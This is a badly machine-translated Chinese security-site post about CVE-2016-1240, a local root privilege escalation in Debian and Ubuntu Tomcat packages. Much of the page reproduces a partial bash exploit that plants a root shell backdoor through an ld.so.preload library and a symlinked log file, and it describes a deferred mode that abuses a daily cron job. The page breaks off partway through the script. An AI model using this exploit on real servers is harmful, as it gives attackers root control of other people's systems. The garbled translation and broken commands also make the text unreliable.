Vulnerability warning: Tomcat aeration local mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 reference PoC-the exploit-warning-the black bar safety net

ID MYHACK58:62201679941
Type myhack58
Reporter 佚名
Modified 2016-10-08T00:00:00


Will you celebrate the National Day, the Tomcat to 1 0 September 1, exposed the local to mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 to. Just a Tomcat user with low privileges, the attacker could use the vulnerability to get to the system ROOT privileges. And the vulnerability of the use the difficulty is not large, the affected users need special attention. Tomcat is running in Apache on the application server, support for running Servlet/JSP application container--can be the Tomcat as an Apache extension, in fact, Tomcat can also be independent of Apache running. ! Vulnerability ID: CVE-2 0 1 6-1 2 4 0 Affect range: Tomcat 8 Tomcat 7 Tomcat 6 Affected systems include Debian, Ubuntu, other use the corresponding deb package system may also be affected. Repair solutions: The Debian security team has fixed the affected packages; the update to the system to provide the latest version of the Tomcat package to. Vulnerability overview: Debian system on Linux administrators typically use apt-get for package management, the CVE-2 0 1 6-1 2 4 0 This is a vulnerability which is the problem in Tomcat deb package,make the deb package to install Tomcat program automatically as administrator to install a startup script:/etc/init. d/tocat* use the script, can lead to an attacker through a low-permissions of the Tomcat user to get system root permission!

Run the script as a daemon

set +e touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina. out chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina. out A local attacker, as the tomcat user, for example, through web application vulnerabilities to the catalina. out modified to point to any file system links, once the Tomcat init script with ROOT permissions running in the service after the restart again open the catalina. out file, the attacker can obtain ROOT privileges. Vulnerability PoC of:

!/ bin/bash

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

CVE-2 0 1 6-1 2 4 0

Discovered and coded by:

Dawid Golunski

This exploit targets the Tomcat (versions 6, 7 and 8) packaging on

Debian-based distros including Debian, Ubuntu etc.

It allows attackers with a tomcat shell (e.g. obtained remotely through a

vulnerable java webapp, or locally via weak permissions on webapps in the

Tomcat webroot directories etc.) to escalate their privileges to root.


./ path_to_catalina. out [-deferred]

The exploit can used in two ways:

-active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

gains/executes a rootshell via ld. so. preload as soon as the Tomcat service is restarted.

It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up

a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

-deferred (the requires the-deferred switch on argv[2]) - this mode symlinks the logfile to

/etc/default/locale and exits. It removes the need for the Trojan to run in a loop waiting.

Attackers can come back at a later time and check on the /etc/default/locale file. Upon a

Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

then add arbitrary commands to the file which will be executed with root privileges by

the /etc/cron. daily/tomcatN logrotation cronjob (run daily around 6:25am on default

Ubuntu/Debian Tomcat installations).

See full advisory for details at:


For testing purposes only. Do no harm.

BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/tomcatrootsh" PRIVESCLIB="/tmp/privesclib. so" PRIVESCSRC="/tmp/privesclib. c" SUIDBIN="/usr/bin/sudo" function cleanexit {


echo-e "\n[+] Cleaning up..." rm-f $PRIVESCSRC rm-f $PRIVESCLIB rm-f $TOMCATLOG touch $TOMCATLOG if [ -f /etc/ld. so. preload ]; then echo-n > /etc/ld. so. preload 2>/dev/null fi echo-e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo-e "\n[+] Active exploitation aborted. Remember you can use-deferred switch for deferred exploitation." cleanexit 0 }


echo-e "\0 3 3[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2 0 1 6-1 2 4 0\n" echo-e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers. com \0 3 3[0m"


if [ $# -lt 1 ]; then echo-e "\n[!] Exploit usage: \n\n$0 path_to_catalina. out [-deferred]\n" exit 3 fi if [ "$2" = "-deferred" ]; then mode="deferred"

[1] [2] [3] next